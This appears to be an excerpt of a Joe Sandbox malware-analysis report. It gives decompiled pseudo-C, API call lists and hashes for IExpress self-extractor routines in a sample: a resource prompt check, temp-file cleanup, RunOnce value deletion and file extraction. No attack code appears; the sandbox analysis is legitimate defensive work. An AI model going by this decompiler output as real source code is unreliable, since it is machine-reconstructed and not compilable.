                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E003251E5(void* __eflags) {
                                                                                                                                                                                                                                            				int _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				void* _t28;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t1 = E0032468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                            				if(_t28 != 0) {
                                                                                                                                                                                                                                            					if(E0032468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                            						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                            						if(_t5 != 0) {
                                                                                                                                                                                                                                            							_t6 = E003244B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                            							LocalFree(_t28);
                                                                                                                                                                                                                                            							if(_t6 != 6) {
                                                                                                                                                                                                                                            								 *0x329124 = 0x800704c7;
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								return 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							 *0x329124 = 0;
                                                                                                                                                                                                                                            							L6:
                                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t28);
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					E003244B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					LocalFree(_t28);
                                                                                                                                                                                                                                            					 *0x329124 = 0x80070714;
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E003244B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            				 *0x329124 = E00326285();
                                                                                                                                                                                                                                            				goto L10;
                                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                                            0x003251fb
                                                                                                                                                                                                                                            0x00325207
                                                                                                                                                                                                                                            0x0032520b
                                                                                                                                                                                                                                            0x0032523c
                                                                                                                                                                                                                                            0x00325268
                                                                                                                                                                                                                                            0x00325270
                                                                                                                                                                                                                                            0x0032528b
                                                                                                                                                                                                                                            0x00325293
                                                                                                                                                                                                                                            0x0032529c
                                                                                                                                                                                                                                            0x003252a6
                                                                                                                                                                                                                                            0x003252b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003252b0
                                                                                                                                                                                                                                            0x0032529e
                                                                                                                                                                                                                                            0x00325279
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032527b
                                                                                                                                                                                                                                            0x00325273
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325273
                                                                                                                                                                                                                                            0x0032524a
                                                                                                                                                                                                                                            0x00325250
                                                                                                                                                                                                                                            0x00325256
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00325256
                                                                                                                                                                                                                                            0x00325219
                                                                                                                                                                                                                                            0x00325223
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246A0
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: SizeofResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246A9
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003246C3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LoadResource.KERNEL32(00000000,00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246CC
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: LockResource.KERNEL32(00000000,?,00322D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003246D3
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: memcpy_s.MSVCRT ref: 003246E5
                                                                                                                                                                                                                                              • Part of subcall function 0032468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003246EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00322F4D,?,00000002,00000000), ref: 00325201
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00325250
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00324518
                                                                                                                                                                                                                                              • Part of subcall function 003244B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00324554
                                                                                                                                                                                                                                              • Part of subcall function 00326285: GetLastError.KERNEL32(00325BBC), ref: 00326285
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                            • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                            • Opcode ID: c991a7ea88f459146e97a3911308d0cce264d4c72f1040f79f2f65f358c105b6
                                                                                                                                                                                                                                            • Instruction ID: 3a6717abd1b605ec374a8ad29a8568ac8b68b4c319b38bc498cba395996433a1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c991a7ea88f459146e97a3911308d0cce264d4c72f1040f79f2f65f358c105b6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8711B675601721EFD3276B727D46B3B719EEB89350F11482DFB46D91D0DA799C024124
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 74%
                                                                                                                                                                                                                                            			E003252B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                                            				CHAR** _t31;
                                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 = __edi;
                                                                                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                                                                                            				_t21 = __ebx;
                                                                                                                                                                                                                                            				_t9 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_t31 =  *0x3291e0; // 0x2b58e90
                                                                                                                                                                                                                                            				if(_t31 != 0) {
                                                                                                                                                                                                                                            					_push(__edi);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t29 = _t31;
                                                                                                                                                                                                                                            						if( *0x328a24 == 0 &&  *0x329a30 == 0) {
                                                                                                                                                                                                                                            							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                            							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t31 = _t31[1];
                                                                                                                                                                                                                                            						LocalFree( *_t29);
                                                                                                                                                                                                                                            						LocalFree(_t29);
                                                                                                                                                                                                                                            					} while (_t31 != 0);
                                                                                                                                                                                                                                            					_pop(_t28);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 =  *0x328a20; // 0x0
                                                                                                                                                                                                                                            				_pop(_t32);
                                                                                                                                                                                                                                            				if(_t11 != 0 &&  *0x328a24 == 0 &&  *0x329a30 == 0) {
                                                                                                                                                                                                                                            					_push(_t22);
                                                                                                                                                                                                                                            					E00321781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            					if(( *0x329a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                            						E003265E8( &_v268);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                            					_t22 =  &_v268;
                                                                                                                                                                                                                                            					E00322390( &_v268);
                                                                                                                                                                                                                                            					_t11 =  *0x328a20; // 0x0
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *0x329a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                            					_t11 = E00321FE1(_t22); // executed
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				 *0x328a20 =  *0x328a20 & 0x00000000;
                                                                                                                                                                                                                                            				return E00326CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                            			}












                                                                                                                                                                                                                                            0x003252b6
                                                                                                                                                                                                                                            0x003252b6
                                                                                                                                                                                                                                            0x003252b6
                                                                                                                                                                                                                                            0x003252c1
                                                                                                                                                                                                                                            0x003252c8
                                                                                                                                                                                                                                            0x003252cb
                                                                                                                                                                                                                                            0x003252cc
                                                                                                                                                                                                                                            0x003252d4
                                                                                                                                                                                                                                            0x003252d6
                                                                                                                                                                                                                                            0x003252d7
                                                                                                                                                                                                                                            0x003252de
                                                                                                                                                                                                                                            0x003252e0
                                                                                                                                                                                                                                            0x003252f2
                                                                                                                                                                                                                                            0x003252fa
                                                                                                                                                                                                                                            0x003252fa
                                                                                                                                                                                                                                            0x00325302
                                                                                                                                                                                                                                            0x00325305
                                                                                                                                                                                                                                            0x0032530c
                                                                                                                                                                                                                                            0x00325312
                                                                                                                                                                                                                                            0x00325316
                                                                                                                                                                                                                                            0x00325316
                                                                                                                                                                                                                                            0x00325317
                                                                                                                                                                                                                                            0x0032531c
                                                                                                                                                                                                                                            0x0032531f
                                                                                                                                                                                                                                            0x00325333
                                                                                                                                                                                                                                            0x00325345
                                                                                                                                                                                                                                            0x00325351
                                                                                                                                                                                                                                            0x00325359
                                                                                                                                                                                                                                            0x00325359
                                                                                                                                                                                                                                            0x00325363
                                                                                                                                                                                                                                            0x00325369
                                                                                                                                                                                                                                            0x0032536f
                                                                                                                                                                                                                                            0x00325374
                                                                                                                                                                                                                                            0x00325374
                                                                                                                                                                                                                                            0x00325381
                                                                                                                                                                                                                                            0x00325387
                                                                                                                                                                                                                                            0x00325387
                                                                                                                                                                                                                                            0x0032538f
                                                                                                                                                                                                                                            0x003253a0

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(02B58E90,00000080,?,00000000), ref: 003252F2
                                                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(02B58E90), ref: 003252FA
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(02B58E90,?,00000000), ref: 00325305
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(02B58E90), ref: 0032530C
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(003211FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00325363
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00325334
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                            • API String ID: 2833751637-1116576409
                                                                                                                                                                                                                                            • Opcode ID: 59a35a1e31ab5148816670cb254bcdb93d5126a2844ba03895aa54ec808c6743
                                                                                                                                                                                                                                            • Instruction ID: 315dbd303349d3957e5fd7b61c84e005af0185d9b412aa0e5b7ce1d24324296f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59a35a1e31ab5148816670cb254bcdb93d5126a2844ba03895aa54ec808c6743
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5821F335901A24DFDB33DB10FD0AB6937B8BB14750F05511EEA82561A4CFB05E96CB80
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00321FE1(void* __ecx) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				if( *0x328530 != 0) {
                                                                                                                                                                                                                                            					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                            					if(_t4 == 0) {
                                                                                                                                                                                                                                            						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                                                                                                                                                                                            						return RegCloseKey(_v8);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t4;
                                                                                                                                                                                                                                            			}





                                                                                                                                                                                                                                            0x00321fee
                                                                                                                                                                                                                                            0x00322005
                                                                                                                                                                                                                                            0x0032200d
                                                                                                                                                                                                                                            0x00322017
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322020
                                                                                                                                                                                                                                            0x0032200d
                                                                                                                                                                                                                                            0x00322029

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0032538C,?,?,0032538C), ref: 00322005
                                                                                                                                                                                                                                            • RegDeleteValueA.KERNELBASE(0032538C,wextract_cleanup1,?,?,0032538C), ref: 00322017
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(0032538C,?,?,0032538C), ref: 00322020
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                                                                                                                                                                                            • API String ID: 849931509-1592051331
                                                                                                                                                                                                                                            • Opcode ID: f5f9ef12644f9fc39ccccc4e1c387b8128d906e339ea98f7ae2ad8bf756cc65c
                                                                                                                                                                                                                                            • Instruction ID: afe9e7684470042cad17fc3fcaa4d16563b403ebfd7aef3bcafd2942489b2ba3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5f9ef12644f9fc39ccccc4e1c387b8128d906e339ea98f7ae2ad8bf756cc65c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50E08630951328BBD7338FD0FC0AF5A7B2DFB01740F204298F904A0060EB715E15E605
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00324CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				long _t35;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				struct HWND__* _t37;
                                                                                                                                                                                                                                            				long _t38;
                                                                                                                                                                                                                                            				long _t39;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				long _t44;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				long _t46;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				long _t51;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				long _t59;
                                                                                                                                                                                                                                            				char* _t63;
                                                                                                                                                                                                                                            				long _t64;
                                                                                                                                                                                                                                            				CHAR* _t71;
                                                                                                                                                                                                                                            				CHAR* _t74;
                                                                                                                                                                                                                                            				int _t75;
                                                                                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                            				_v8 = _t30;
                                                                                                                                                                                                                                            				_t75 = _a8;
                                                                                                                                                                                                                                            				if( *0x3291d8 == 0) {
                                                                                                                                                                                                                                            					_t32 = _a4;
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 == 0) {
                                                                                                                                                                                                                                            						_t33 = E00324E99(_t75);
                                                                                                                                                                                                                                            						L35:
                                                                                                                                                                                                                                            						return E00326CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t35 = _t32 - 1;
                                                                                                                                                                                                                                            					__eflags = _t35;
                                                                                                                                                                                                                                            					if(_t35 == 0) {
                                                                                                                                                                                                                                            						L9:
                                                                                                                                                                                                                                            						_t33 = 0;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t36 = _t35 - 1;
                                                                                                                                                                                                                                            					__eflags = _t36;
                                                                                                                                                                                                                                            					if(_t36 == 0) {
                                                                                                                                                                                                                                            						_t37 =  *0x328584; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t37;
                                                                                                                                                                                                                                            						if(_t37 != 0) {
                                                                                                                                                                                                                                            							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t54 = 0x3291e4;
                                                                                                                                                                                                                                            						_t58 = 0x3291e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t38 =  *_t58;
                                                                                                                                                                                                                                            							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                            							__eflags = _t38;
                                                                                                                                                                                                                                            						} while (_t38 != 0);
                                                                                                                                                                                                                                            						_t59 = _t58 - 0x3291e5;
                                                                                                                                                                                                                                            						__eflags = _t59;
                                                                                                                                                                                                                                            						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t39 =  *_t71;
                                                                                                                                                                                                                                            							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                            							__eflags = _t39;
                                                                                                                                                                                                                                            						} while (_t39 != 0);
                                                                                                                                                                                                                                            						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                            						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							L3:
                                                                                                                                                                                                                                            							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0x3291e4;
                                                                                                                                                                                                                                            						_t30 = E00324702( &_v268, 0x3291e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t41 = E0032476D( &_v268, __eflags);
                                                                                                                                                                                                                                            						__eflags = _t41;
                                                                                                                                                                                                                                            						if(_t41 == 0) {
                                                                                                                                                                                                                                            							goto L9;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(0x180);
                                                                                                                                                                                                                                            						_t30 = E00324980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                            						_t75 = _t30;
                                                                                                                                                                                                                                            						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                            						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E003247E0( &_v268);
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0x3293f4 =  *0x3293f4 + 1;
                                                                                                                                                                                                                                            						_t33 = _t75;
                                                                                                                                                                                                                                            						goto L35;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t44 = _t36 - 1;
                                                                                                                                                                                                                                            					__eflags = _t44;
                                                                                                                                                                                                                                            					if(_t44 == 0) {
                                                                                                                                                                                                                                            						_t54 = 0x3291e4;
                                                                                                                                                                                                                                            						_t63 = 0x3291e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t45 =  *_t63;
                                                                                                                                                                                                                                            							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                            							__eflags = _t45;
                                                                                                                                                                                                                                            						} while (_t45 != 0);
                                                                                                                                                                                                                                            						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                            						_t64 = _t63 - 0x3291e5;
                                                                                                                                                                                                                                            						__eflags = _t64;
                                                                                                                                                                                                                                            						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t46 =  *_t74;
                                                                                                                                                                                                                                            							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                            							__eflags = _t46;
                                                                                                                                                                                                                                            						} while (_t46 != 0);
                                                                                                                                                                                                                                            						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                            						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                            						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                            						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 = 0x3291e4;
                                                                                                                                                                                                                                            						_t30 = E00324702( &_v268, 0x3291e4,  *(_t75 + 4));
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                            						_t30 = E00324C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						E00324B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                            						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                            						__eflags = _t50;
                                                                                                                                                                                                                                            						if(_t50 != 0) {
                                                                                                                                                                                                                                            							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                            							__eflags = _t51;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t51 = 0x80;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                            						__eflags = _t30;
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L3;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t33 = 1;
                                                                                                                                                                                                                                            							goto L35;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t30 = _t44 - 1;
                                                                                                                                                                                                                                            					__eflags = _t30;
                                                                                                                                                                                                                                            					if(_t30 == 0) {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L9;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_a4 == 3) {
                                                                                                                                                                                                                                            					_t30 = E00324B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L3;
                                                                                                                                                                                                                                            			}































                                                                                                                                                                                                                                            0x00324cd0
                                                                                                                                                                                                                                            0x00324cdb
                                                                                                                                                                                                                                            0x00324ce0
                                                                                                                                                                                                                                            0x00324ce2
                                                                                                                                                                                                                                            0x00324cee
                                                                                                                                                                                                                                            0x00324cf2
                                                                                                                                                                                                                                            0x00324d0e
                                                                                                                                                                                                                                            0x00324d0e
                                                                                                                                                                                                                                            0x00324d11
                                                                                                                                                                                                                                            0x00324e83
                                                                                                                                                                                                                                            0x00324e88
                                                                                                                                                                                                                                            0x00324e98
                                                                                                                                                                                                                                            0x00324e98
                                                                                                                                                                                                                                            0x00324d17
                                                                                                                                                                                                                                            0x00324d17
                                                                                                                                                                                                                                            0x00324d1a
                                                                                                                                                                                                                                            0x00324d2f
                                                                                                                                                                                                                                            0x00324d2f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324d2f
                                                                                                                                                                                                                                            0x00324d1c
                                                                                                                                                                                                                                            0x00324d1c
                                                                                                                                                                                                                                            0x00324d1f
                                                                                                                                                                                                                                            0x00324dcb
                                                                                                                                                                                                                                            0x00324dd0
                                                                                                                                                                                                                                            0x00324dd2
                                                                                                                                                                                                                                            0x00324ddd
                                                                                                                                                                                                                                            0x00324ddd
                                                                                                                                                                                                                                            0x00324de3
                                                                                                                                                                                                                                            0x00324de8
                                                                                                                                                                                                                                            0x00324ded
                                                                                                                                                                                                                                            0x00324ded
                                                                                                                                                                                                                                            0x00324def
                                                                                                                                                                                                                                            0x00324df0
                                                                                                                                                                                                                                            0x00324df0
                                                                                                                                                                                                                                            0x00324df4
                                                                                                                                                                                                                                            0x00324df4
                                                                                                                                                                                                                                            0x00324df6
                                                                                                                                                                                                                                            0x00324df9
                                                                                                                                                                                                                                            0x00324dfc
                                                                                                                                                                                                                                            0x00324dfc
                                                                                                                                                                                                                                            0x00324dfe
                                                                                                                                                                                                                                            0x00324dff
                                                                                                                                                                                                                                            0x00324dff
                                                                                                                                                                                                                                            0x00324e03
                                                                                                                                                                                                                                            0x00324e08
                                                                                                                                                                                                                                            0x00324e0a
                                                                                                                                                                                                                                            0x00324e0f
                                                                                                                                                                                                                                            0x00324d03
                                                                                                                                                                                                                                            0x00324d03
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00324d03
                                                                                                                                                                                                                                            0x00324e18
                                                                                                                                                                                                                                            0x00324e20
                                                                                                                                                                                                                                            0x00324e25
                                                                                                                                                                                                                                            0x00324e27
